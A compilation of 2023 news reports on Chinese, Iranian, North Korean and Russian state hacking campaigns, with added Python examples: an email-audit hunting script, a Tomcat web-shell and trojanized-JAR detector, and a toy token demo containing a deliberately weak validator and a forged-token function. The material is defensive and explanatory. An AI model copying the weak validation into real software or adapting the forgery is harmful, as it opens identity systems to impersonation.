U.S. Government Agencies' Emails Compromised in China-Backed Cyber Attack
13.7.23 BigBrothers The Hacker News
An unnamed Federal Civilian Executive Branch (FCEB) agency in the U.S. detected anomalous email activity in mid-June 2023, leading to Microsoft's discovery of a new China-linked espionage campaign targeting two dozen organizations.
The details come from a joint cybersecurity advisory released by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) on July 12, 2023.
"In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment," the authorities said. "Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data."
While the name of the government agency was not revealed, CNN and the Washington Post reported it was the U.S. State Department, citing people familiar with the matter. Also targeted were the Commerce Department as well as the email accounts belonging to a congressional staffer, a U.S. human rights advocate, and U.S. think tanks. The number of affected organizations in the U.S. is estimated to be in the single digits.
The disclosure comes a day after the tech giant attributed the campaign to an emerging "China-based threat actor" it tracks under the name Storm-0558, which primarily targets government agencies in Western Europe and focuses on espionage and data theft. Evidence gathered so far shows that the malicious activity began a month earlier before it was detected.
China, however, has rejected accusations it was behind the hacking incident, calling the U.S. "the world's biggest hacking empire and global cyber thief" and that it's "high time that the U.S. explained its cyber attack activities and stopped spreading disinformation to deflect public attention."
The attack chain entailed the cyberspies leveraging forged authentication tokens to gain access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com. The tokens were forged using an acquired Microsoft account (MSA) consumer signing key. How the actor obtained the key remains unclear.
Also used by Storm-0558 to facilitate credential access are two custom malware tools named Bling and Cigril, the latter of which has been characterized as a trojan that decrypts encrypted files and runs them directly from system memory in order to avoid detection.
CISA said the FCEB agency was able to identify the breach by leveraging enhanced logging in Microsoft Purview Audit, specifically using the MailItemsAccessed mailbox-auditing action.
The agency is further recommending that organizations enable Purview Audit (Premium) logging, turn on Microsoft 365 Unified Audit Logging (UAL), and ensure logs are searchable by operators to allow hunting for this kind of activity and differentiate it from expected behavior within the environment.
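The hunt CISA describes, MailItemsAccessed records compared against what is normal for each mailbox, can be scripted over an export of the audit log. The block below is an added example, not CISA's or Microsoft's tooling. It assumes the records were exported one JSON object per line (for instance the AuditData column returned by Search-UnifiedAuditLog) and reads the MailItemsAccessed fields Operation, UserId, ClientIPAddress, OperationProperties (MailAccessType, IsThrottled) and Folders/FolderItems; every record, user and IP address in it is constructed.

```python
"""Flag MailItemsAccessed events from an IP address not previously seen for that mailbox.

Added example, not CISA's or Microsoft's tooling. The export format and the
field names are assumptions described in the lead-in; all records, users and
addresses are constructed (documentation IP ranges).
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta


def _record(ts, user, ip, access, items, throttled=False):
    """Build one constructed MailItemsAccessed record in the shape of the export."""
    return {
        "CreationTime": ts,
        "Operation": "MailItemsAccessed",
        "Workload": "Exchange",
        "UserId": user,
        "ClientIPAddress": ip,
        "OperationProperties": [
            {"Name": "MailAccessType", "Value": access},
            {"Name": "IsThrottled", "Value": "True" if throttled else "False"},
        ],
        "Folders": [{
            "Path": "\\Inbox",
            "FolderItems": [{"InternetMessageId": f"<{i}@agency.example>"} for i in range(items)],
        }],
    }


SAMPLE_EXPORT = "\n".join(json.dumps(r) for r in [
    # two weeks of ordinary access define the baseline
    _record("2023-06-01T08:02:11", "alice@agency.example", "203.0.113.10", "Bind", 1),
    _record("2023-06-02T09:15:40", "alice@agency.example", "203.0.113.10", "Sync", 40),
    _record("2023-06-02T09:16:02", "bob@agency.example", "198.51.100.7", "Bind", 2),
    _record("2023-06-05T17:44:19", "alice@agency.example", "203.0.113.10", "Bind", 1),
    # hunting window: one familiar access, one from an address never seen for this mailbox
    _record("2023-06-15T10:22:41", "alice@agency.example", "203.0.113.10", "Bind", 1),
    _record("2023-06-15T03:07:58", "alice@agency.example", "192.0.2.44", "Sync", 3),
    # a non-mail-access operation, ignored by the hunt
    {"CreationTime": "2023-06-15T03:08:10", "Operation": "MailboxLogin",
     "UserId": "alice@agency.example", "ClientIPAddress": "192.0.2.44", "Workload": "Exchange"},
])


def parse_export(text):
    """Parse a JSON-lines export; unwrap AuditData if it is still a JSON string."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if isinstance(rec.get("AuditData"), str):
            rec = json.loads(rec["AuditData"])
        records.append(rec)
    return records


def _prop(rec, name):
    for prop in rec.get("OperationProperties", []):
        if prop.get("Name") == name:
            return prop.get("Value")
    return rec.get(name)


def _item_count(rec):
    return sum(len(folder.get("FolderItems", [])) for folder in rec.get("Folders", []))


def hunt(records, baseline_days=7, now=None):
    """Return MailItemsAccessed events in the last `baseline_days` whose IP is new for the user.

    Older events define each mailbox's familiar addresses. Each finding carries the
    access type, the number of items touched and whether the record was throttled
    (a throttled record under-reports how many items were really read).
    """
    mail = [r for r in records if r.get("Operation") == "MailItemsAccessed"]
    if not mail:
        return []
    stamp = lambda r: datetime.fromisoformat(r["CreationTime"])
    now = now or max(stamp(r) for r in mail)
    cutoff = now - timedelta(days=baseline_days)

    baseline = defaultdict(set)
    window = []
    for r in mail:
        if stamp(r) < cutoff:
            baseline[r["UserId"]].add(r["ClientIPAddress"])
        else:
            window.append(r)

    findings = []
    for r in window:
        user, ip = r["UserId"], r["ClientIPAddress"]
        if ip in baseline[user]:
            continue
        findings.append({
            "time": r["CreationTime"],
            "user": user,
            "ip": ip,
            "access_type": _prop(r, "MailAccessType"),
            "items": _item_count(r),
            "throttled": str(_prop(r, "IsThrottled")).lower() == "true",
        })
    return findings


if __name__ == "__main__":
    for finding in hunt(parse_export(SAMPLE_EXPORT)):
        print(finding)
```

A new address is a lead, not a verdict: the next step is to pivot on the same IP across other operations (the MailboxLogin record in the sample) and on the client string, and a "Sync" access from an unfamiliar address deserves attention first because one sync pulls whole folders. MailItemsAccessed is only recorded when the enhanced Purview Audit logging the advisory refers to is enabled, which is why the advisory leads with turning it on.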
"Organizations are encouraged to look for outliers and become familiar with baseline patterns to better understand abnormal versus normal traffic," CISA and FBI added.
Microsoft Thwarts Chinese Cyber Attack Targeting Western European Governments
12.7.23 BigBrothers The Hacker News
Microsoft on Tuesday revealed that it repelled a cyber attack staged by a Chinese nation-state actor targeting two dozen organizations, some of which include government agencies, in a cyber espionage campaign designed to acquire confidential data.
The attacks, which commenced on May 15, 2023, entailed access to email accounts affecting approximately 25 entities and a small number of related individual consumer accounts.
The tech giant attributed the campaign to Storm-0558, describing it as a nation-state activity group based out of China that primarily singles out government agencies in Western Europe.
"They focus on espionage, data theft, and credential access," Microsoft said. "They are also known to use custom malware that Microsoft tracks as Cigril and Bling, for credential access."
The breach is said to have been detected a month later on June 16, 2023, after an unidentified customer reported the anomalous email activity to the company.
Microsoft said it notified all targeted or compromised organizations directly via their tenant admins. It did not name the organizations and agencies affected and the number of accounts that may have been hacked.
However, according to the Washington Post, the attackers also broke into a number of unclassified U.S. email accounts.
The access to customer email accounts, per Redmond, was facilitated through Outlook Web Access in Exchange Online (OWA) and Outlook.com by forging authentication tokens.
"The actor used an acquired MSA key to forge tokens to access OWA and Outlook.com," it explained. "MSA (consumer) keys and Azure AD (enterprise) keys are issued and managed from separate systems and should only be valid for their respective systems."
"The actor exploited a token validation issue to impersonate Azure AD users and gain access to enterprise mail."
There is no evidence that the threat actor used Azure AD keys or any other MSA keys to carry out the attacks. Microsoft has since blocked the usage of tokens signed with the acquired MSA key in OWA to mitigate the attack.
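The validation issue described in this report and in the CISA/FBI advisory above comes down to a key from one trust domain being honoured for identities of another. The block below shows that mistake and its fix in miniature. It is an added illustration, not Microsoft's code and not a reproduction of the actual flaw: Microsoft's tokens are RSA-signed, whereas this toy uses HS256 from the standard library so it runs offline, and every key id, issuer, audience and user name in it is invented.

```python
"""Key-scope confusion in token validation: a consumer signing key accepted
for enterprise identities, and the fix (bind each key id to its issuer).

Added illustration, not Microsoft's code. HS256 is used instead of RSA so the
block runs with the standard library; key ids, issuers, audiences and users
are invented.
"""
import base64
import hashlib
import hmac
import json
import time

# Two signing keys that live in separate systems and should only vouch for
# their own issuer. The weak validator puts them in one shared lookup table.
KEYS = {
    "msa-consumer-2023": b"consumer-secret",      # consumer (MSA-like) key
    "aad-enterprise-2023": b"enterprise-secret",  # enterprise (Azure AD-like) key
}
CONSUMER_ISS = "https://login.consumer.example"
ENTERPRISE_ISS = "https://login.enterprise.example"
MAIL_AUD = "https://mail.example"
# Which key ids each issuer is allowed to sign with.
ISSUER_KEYS = {
    CONSUMER_ISS: {"msa-consumer-2023"},
    ENTERPRISE_ISS: {"aad-enterprise-2023"},
}


def _b64u(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64u(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign(claims, kid):
    """Mint an HS256 token under the named key."""
    header = {"alg": "HS256", "typ": "JWT", "kid": kid}
    signing_input = _b64u(json.dumps(header).encode()) + "." + _b64u(json.dumps(claims).encode())
    mac = hmac.new(KEYS[kid], signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64u(mac)


def _verify_signature(token):
    """Check alg, signature and expiry; return (header, claims). Raises ValueError."""
    h, c, s = token.split(".")
    header = json.loads(_unb64u(h))
    claims = json.loads(_unb64u(c))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    key = KEYS.get(header.get("kid"))
    if key is None:
        raise ValueError("unknown kid")
    expected = hmac.new(key, f"{h}.{c}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64u(s)):
        raise ValueError("bad signature")
    if claims.get("exp", 0) <= time.time():
        raise ValueError("expired")
    return header, claims


def validate_weak(token, expected_aud):
    """Vulnerable: any key in the shared table is trusted, whatever issuer the token claims."""
    _, claims = _verify_signature(token)
    if claims.get("aud") != expected_aud:
        raise ValueError("wrong audience")
    return claims


def validate_strict(token, expected_iss, expected_aud):
    """Fixed: the key id must belong to the issuer before the signature counts for anything."""
    header, claims = _verify_signature(token)
    if claims.get("iss") != expected_iss:
        raise ValueError("wrong issuer")
    if header.get("kid") not in ISSUER_KEYS[expected_iss]:
        raise ValueError("key not valid for this issuer")
    if claims.get("aud") != expected_aud:
        raise ValueError("wrong audience")
    return claims


def _enterprise_claims(subject):
    return {"iss": ENTERPRISE_ISS, "aud": MAIL_AUD, "sub": subject, "exp": int(time.time()) + 600}


def forged_enterprise_token():
    """An attacker holding only the consumer key asserts an enterprise identity."""
    return sign(_enterprise_claims("alice@contoso.example"), "msa-consumer-2023")


def legit_enterprise_token():
    return sign(_enterprise_claims("bob@contoso.example"), "aad-enterprise-2023")


def accepts(validator, *args):
    try:
        validator(*args)
        return True
    except ValueError:
        return False
```

The forged token carries a valid signature, just under the wrong key, so a validator that only asks "is this signed by some key I know?" lets it through; the strict validator fails it on the kid-to-issuer binding before the audience check is even reached. Blocking tokens signed by one compromised key, as Microsoft did, addresses the symptom; the binding is what stops the next key.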
"This type of espionage-motivated adversary seeks to abuse credentials and gain access to data residing in sensitive systems," Charlie Bell, executive vice president of Microsoft Security, said.
The disclosure comes more than a month after Microsoft exposed critical infrastructure attacks mounted by a Chinese adversarial collective called Volt Typhoon (aka Bronze Silhouette or Vanguard Panda) targeting the U.S.
Swedish Data Protection Authority Warns Companies Against Google Analytics Use
5.7.23 BigBrothers The Hacker News
The Swedish data protection watchdog has warned companies against using Google Analytics due to risks posed by U.S. government surveillance, following similar moves by Austria, France, and Italy last year.
The development comes in the aftermath of an audit initiated by the Swedish Authority for Privacy Protection (IMY) against four companies CDON, Coop, Dagens Industri, and Tele2.
"In its audits, IMY considers that the data transferred to the U.S. via Google's statistics tool is personal data because the data can be linked with other unique data that is transferred," IMY said.
"The authority also concludes that the technical security measures that the companies have taken are not sufficient to ensure a level of protection that essentially corresponds to that guaranteed within the EU/EEA."
The data protection authority also fined Swedish telecom service provider Tele2 about $1.1 million and local online marketplace CDON less than $30,000 for failing to implement adequate security measures to anonymize the data prior to the transfer.
Furthermore, CDON, Coop, and Dagens Industri have been ordered to cease using Google Analytics. Tele2 is said to have voluntarily stopped using the service.
The investigation, the IMY added, was based on a complaint filed by the privacy non-profit None of Your Business (noyb) alleging violations of the General Data Protection Regulation (GDPR) laws.
The decision is rooted in the fact that such E.U.-U.S. data transfers have been found illegal in light of potential surveillance worries that data stored in U.S. servers could be subject to access by intelligence agencies in the country.
Similar concerns have led to Meta being levied a record $1.3 billion fine by European Union data protection agencies. That said, the E.U. and U.S. are in the process of finalizing a new data transfer arrangement, called the E.U.-U.S. Data Privacy Framework, that replaces the now-invalid Privacy Shield.
Iranian Hackers Using POWERSTAR Backdoor in Targeted Espionage Attacks
1.7.23 BigBrothers The Hacker News
Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been linked to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR.
"There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week.
The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda.
Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiao, suggesting that the group is utilizing an array of espionage tools at its disposal to realize its strategic objectives.
POWERSTAR is another addition to the group's arsenal. Also called CharmPower, the backdoor was first publicly documented by Check Point in January 2022, uncovering its use in connection with attacks weaponizing the Log4Shell vulnerabilities in publicly-exposed Java applications.
It has since been put to use in at least two other campaigns, as documented by PwC in July 2022 and Microsoft in April 2023.
Volexity, which detected a rudimentary variant of POWERSTAR in 2021 distributed by a malicious macro embedded in a DOCM file, said the May 2023 attack wave leverages an LNK file inside a password-protected RAR file to download the backdoor from Backblaze, while also taking steps to hinder analysis.
"With POWERSTAR, Charming Kitten sought to limit the risk of exposing their malware to analysis and detection by delivering the decryption method separately from the initial code and never writing it to disk," the researchers said.
"This has the added bonus of acting as an operational guardrail, as decoupling the decryption method from its command-and-control (C2) server prevents future successful decryption of the corresponding POWERSTAR payload."
The backdoor comes with an extensive set of features that enable it to remotely execute PowerShell and C# commands, set up persistence, collect system information, and download and execute more modules to enumerate running processes, capture screenshots, search for files matching specific extensions, and monitor if persistence components are still intact.
Also improved and expanded from the earlier version is the cleanup module that's designed to erase all traces of the malware's footprint as well as delete persistence-related registry keys. These updates point to Charming Kitten's continued efforts to refine its techniques and evade detection.
Volexity said it also detected a different variant of POWERSTAR that attempts to retrieve a hard-coded C2 server by decoding a file stored on the decentralized InterPlanetary Filesystem (IPFS), signaling an attempt to make its attack infrastructure more resilient.
The development coincides with MuddyWater's (aka Static Kitten) use of a previously undocumented command-and-control (C2) framework called PhonyC2 to deliver malicious payloads to compromised hosts.
"The general phishing playbook used by Charming Kitten and the overall purpose of POWERSTAR remain consistent," the researchers said. "The references to persistence mechanisms and executable payloads within the POWERSTAR Cleanup module strongly suggests a broader set of tools used by Charming Kitten to conduct malware-enabled espionage."
North Korean Hacker Group Andariel Strikes with New EarlyRat Malware
30.6.23 BigBrothers The Hacker News
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in phishing attacks, adding another piece to the group's wide-ranging toolset.
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report.
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group.
The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income for the sanctions-hit nation.
Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backdoors such as Dtrack (aka Valefor and Preft), NukeSped (aka Manuscrypt), MagicRAT, and YamaBot.
NukeSped contains a range of features to create and terminate processes and move, read, and write files on the infected host. The use of NukeSped overlaps with a campaign tracked by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) under the name TraderTraitor.
Andariel's weaponization of the Log4Shell vulnerability in unpatched VMware Horizon servers was previously documented by AhnLab Security Emergency Response Center (ASEC) and Cisco Talos in 2022.
The latest attack chain discovered by Kaspersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents. The files, when opened, prompt the recipients to enable macros, leading to the execution of VBA code responsible for downloading the trojan.
Described as a simple but limited backdoor, EarlyRat is designed to collect and exfiltrate system information to a remote server as well as execute arbitrary commands. It also shares high-level similarities with MagicRAT, although EarlyRat is written using a framework called PureBasic whereas MagicRAT employs the Qt framework.
Another previously unseen tactic observed in attacks exploiting the Log4j Log4Shell vulnerability last year concerns the use of legitimate off-the-shelf tools like 3Proxy, ForkDump, NTDSDumpEx, Powerline, and PuTTY for further exploitation of the target.
"Despite being an APT group, Lazarus is known for performing typical cyber crime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated," Kaspersky said. "Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware."
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers
26.6.23 BigBrothers The Hacker News
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard.
The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said.
Midnight Blizzard, formerly known as Nobelium, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes.
The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on previously unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities.
It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area.
"These credential attacks use a variety of password spray, brute-force, and token theft techniques," Microsoft said in a series of tweets, adding the actor "also conducted session replay attacks to gain initial access to cloud resources leveraging stolen sessions likely acquired via illicit sale."
The tech giant further called out APT29 for its use of residential proxy services to route malicious traffic in an attempt to obfuscate connections made using compromised credentials.
"The threat actor likely used these IP addresses for very short periods, which could make scoping and remediation challenging," the Windows maker said.
The development comes as Recorded Future detailed a new spear-phishing campaign orchestrated by APT28 (aka BlueDelta, Forest Blizzard, FROZENLAKE, Iron Twilight, and Fancy Bear) targeting government and military entities in Ukraine since November 2021.
The attacks leveraged emails bearing attachments exploiting multiple vulnerabilities in the open-source Roundcube webmail software (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to conduct reconnaissance and data gathering.
A successful breach enabled the Russian military intelligence hackers to deploy rogue JavaScript malware that redirected the incoming emails of targeted individuals to an email address under the attackers' control as well as steal their contact lists.
"The campaign displayed a high level of preparedness, quickly weaponizing news content into lures to exploit recipients," the cybersecurity company said. "The spear-phishing emails contained news themes related to Ukraine, with subject lines and content mirroring legitimate media sources."
More importantly, the activity is said to dovetail with another set of attacks weaponizing a then-zero-day flaw in Microsoft Outlook (CVE-2023-23397) that Microsoft disclosed as employed in "limited targeted attacks" against European organizations.
The privilege escalation vulnerability was addressed as part of Patch Tuesday updates rolled out in March 2023.
The findings demonstrate Russian threat actors' persistent efforts in harvesting valuable intelligence on various entities in Ukraine and across Europe, especially following the full-scale invasion of the country in February 2022.
The cyberwarfare operations aimed at Ukrainian targets have been notably marked by the widespread deployment of wiper malware designed to delete and destroy data, turning it into one of the earliest instances of large-scale hybrid conflict.
"BlueDelta will almost certainly continue to prioritize targeting Ukrainian government and private sector organizations to support wider Russian military efforts," Recorded Future concluded.
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks
26.6.23 BigBrothers The Hacker News
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest.
The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda.
"The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said.
Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S. government, defense, and other critical infrastructure organizations.
An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against a limited number of victims to carry out long-term malicious acts.
It has been further described as a threat group that "favors web shells for persistence and relies on short bursts of activity primarily involving living-off-the-land binaries to achieve its objectives."
In one unsuccessful incident targeting an unspecified customer, the actor targeted the Zoho ManageEngine ADSelfService Plus service running on an Apache Tomcat server to trigger the execution of suspicious commands pertaining to process enumeration and network connectivity, among others.
"Vanguard Panda's actions indicated a familiarity with the target environment, due to the rapid succession of their commands, as well as having specific internal hostnames and IPs to ping, remote shares to mount, and plaintext credentials to use for WMI," CrowdStrike said.
A closer examination of the Tomcat access logs unearthed several HTTP POST requests to /html/promotion/selfsdp.jspx, a web shell that's camouflaged as the legitimate identity security solution to sidestep detection.
The web shell is believed to have been deployed nearly six months before the aforementioned hands-on-keyboard activity, indicative of extensive prior recon of the target network.
While it's not immediately clear how Vanguard Panda managed to breach the ManageEngine environment, all signs point to the exploitation of CVE-2021-40539, a critical authentication bypass flaw with resultant remote code execution.
It's suspected that the threat actor deleted artifacts and tampered with the access logs to obscure the forensic trail. However, in a glaring misstep, the process failed to account for Java source and compiled class files that were generated during the course of the attack, leading to the discovery of more web shells and backdoors.
This includes a JSP file that's likely retrieved from an external server and which is designed to backdoor "tomcat-websocket.jar" by making use of an ancillary JAR file called "tomcat-ant.jar" that's also fetched remotely by means of a web shell, after which cleanup actions are performed to cover up the tracks.
The trojanized version of tomcat-websocket.jar is fitted with three new Java classes – named A, B, and C – with A.class functioning as another web shell capable of receiving and executing Base64-encoded and AES-encrypted commands.
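Two of the artifacts described above lend themselves to a mechanical check: repeated POSTs to a JSP/JSPX path the application does not normally serve, and a Tomcat library JAR that contains classes its pristine copy does not. The block below is an added example, not CrowdStrike's tooling. Its access-log lines and both JARs are constructed; the "pristine" entry list stands in for one taken from an untouched Tomcat distribution of the same version, the prefixes where JSP content is expected are an assumption about the deployment, and placing the added classes at the archive root is likewise an assumption, since the report only gives their names.

```python
"""Two checks for the intrusion pattern described above: POSTs to an unexpected
JSP/JSPX path in Tomcat access logs, and extra class files in a Tomcat library JAR.

Added example, not CrowdStrike's tooling. Log lines and JAR contents are
constructed; EXPECTED_JSP_PREFIXES and the location of A/B/C.class are assumptions.
"""
import hashlib
import io
import re
import zipfile

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [12/Jun/2023:09:14:02 +0000] "GET /selfservice/index.html HTTP/1.1" 200 5120
10.0.0.5 - - [12/Jun/2023:09:14:03 +0000] "POST /selfservice/login.do HTTP/1.1" 302 -
198.51.100.23 - - [12/Jun/2023:09:20:41 +0000] "POST /html/promotion/selfsdp.jspx HTTP/1.1" 200 812
198.51.100.23 - - [12/Jun/2023:09:20:59 +0000] "POST /html/promotion/selfsdp.jspx HTTP/1.1" 200 14
203.0.113.9 - - [12/Jun/2023:09:21:30 +0000] "GET /html/promotion/selfsdp.jspx HTTP/1.1" 200 14
"""

# Path prefixes under which the deployed application legitimately serves JSPs (assumption).
EXPECTED_JSP_PREFIXES = ("/selfservice/",)


def suspicious_jsp_posts(log_text):
    """Return (client, path, count) for POSTs to .jsp/.jspx targets outside the expected prefixes."""
    counts = {}
    for line in log_text.splitlines():
        match = ACCESS_RE.match(line)
        if not match:
            continue
        path = match.group("path").split("?", 1)[0]
        if match.group("method") != "POST" or not path.lower().endswith((".jsp", ".jspx")):
            continue
        if path.startswith(EXPECTED_JSP_PREFIXES):
            continue
        key = (match.group("host"), path)
        counts[key] = counts.get(key, 0) + 1
    return sorted((host, path, n) for (host, path), n in counts.items())


def jar_entries(jar_bytes):
    """Map each file inside a JAR to the SHA-256 of its contents."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return {info.filename: hashlib.sha256(zf.read(info)).hexdigest()
                for info in zf.infolist() if not info.is_dir()}


def jar_diff(known_good, suspect):
    """Entries added to, or modified in, the suspect JAR relative to the pristine one."""
    added = sorted(set(suspect) - set(known_good))
    changed = sorted(name for name in suspect
                     if name in known_good and suspect[name] != known_good[name])
    return added, changed


def _make_jar(files):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed stand-ins; class bodies are just the Java class-file magic plus filler.
PRISTINE_JAR = _make_jar({
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "org/apache/tomcat/websocket/WsSession.class": b"\xca\xfe\xba\xbe original",
})
TROJANIZED_JAR = _make_jar({
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "org/apache/tomcat/websocket/WsSession.class": b"\xca\xfe\xba\xbe original",
    "A.class": b"\xca\xfe\xba\xbe web shell",  # extra classes; root placement is an assumption
    "B.class": b"\xca\xfe\xba\xbe helper",
    "C.class": b"\xca\xfe\xba\xbe helper",
})

if __name__ == "__main__":
    for host, path, n in suspicious_jsp_posts(SAMPLE_ACCESS_LOG):
        print(f"{host} POSTed {n}x to unexpected JSP {path}")
    added, changed = jar_diff(jar_entries(PRISTINE_JAR), jar_entries(TROJANIZED_JAR))
    print("added:", added, "changed:", changed)
```

The access-log check is only as good as the logs, and the report notes the actor tampered with them; the JAR comparison does not depend on logs at all, and neither do the artifacts that gave the intrusion away, since Tomcat writes the Java source and compiled class for every JSP it serves into its work directory and those files survive a cleaned access log.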
"The use of a backdoored Apache Tomcat library is a previously undisclosed persistence TTP in use by Vanguard Panda," CrowdStrike said, noting with moderated confidence that the implant is used to "enable persistent access to high-value targets downselected after the initial access phase of operations using then zero-day vulnerabilities."
U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog
25.6.23 BigBrothers The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel devices (CVE-2023-27992).
CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019.
Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location.
The attack chain begins with the targeted victim receiving an iMessage with an attachment that automatically triggers the execution of the payload without requiring any interaction, making it a zero-click exploit.
"The malicious message is malformed and does not trigger any alerts or notifications for [the] user," Kaspersky noted in its initial report.
CVE-2023-32434 and CVE-2023-32435 are two of many vulnerabilities in iOS that have been abused in the espionage attack. One among them is CVE-2022-46690, a high-severity out-of-bounds write issue in IOMobileFrameBuffer that could be weaponized by a rogue app to execute arbitrary code with kernel privileges.
The weakness was remediated by Apple with improved input validation in December 2022.
Kaspersky flagged TriangleDB as containing unused features referencing macOS as well as permissions seeking access to the device's microphone, camera, and the address book that it said could be leveraged at a future date.
The Russian cybersecurity company's investigation into Operation Triangulation began at the start of the year when it detected the compromise in its own enterprise network.
In light of active exploitation, Federal Civilian Executive Branch (FCEB) agencies are recommended to apply vendor-provided patches to secure their networks against potential threats.
The development comes as CISA issued an alert warning of three bugs in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite that could pave the way for a denial-of-service (DoS) condition.
The flaws – CVE-2023-2828, CVE-2023-2829, and CVE-2023-2911 (CVSS scores: 7.5) – could be exploited remotely, resulting in the unexpected termination of the named BIND9 service or exhaustion of all available memory on the host running named, leading to DoS.
This is the second time in less than six months that the Internet Systems Consortium (ISC) has released patches to resolve similar issues in BIND9 that could cause DoS and system failures.
NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems
24.6.23 BigBrothers The Hacker News
The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus.
To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition."
BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. The malware, a UEFI bootkit capable of bypassing Windows Secure Boot protections, has since emerged in the wild.
This is accomplished by taking advantage of a known Windows flaw called Baton Drop (CVE-2022-21894, CVSS score: 4.4) in vulnerable boot loaders that have not been added to the Secure Boot DBX revocation list. The vulnerability was addressed by Microsoft in January 2022.
This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable versions and execute BlackLotus on compromised endpoints.
UEFI bootkits like BlackLotus grant a threat actor complete control over the operating system booting procedure, thereby making it possible to interfere with security mechanisms and deploy additional payloads with elevated privileges.
It's worth noting that BlackLotus is not a firmware threat, and instead homes in on the earliest software stage of the boot process to achieve persistence and evasion. There is no evidence that the malware targets Linux systems.
"UEFI bootkits may lose on stealthiness when compared to firmware implants [...] as bootkits are located on an easily accessible FAT32 disk partition," ESET researcher Martin Smolár said in an analysis of BlackLotus in March 2023.
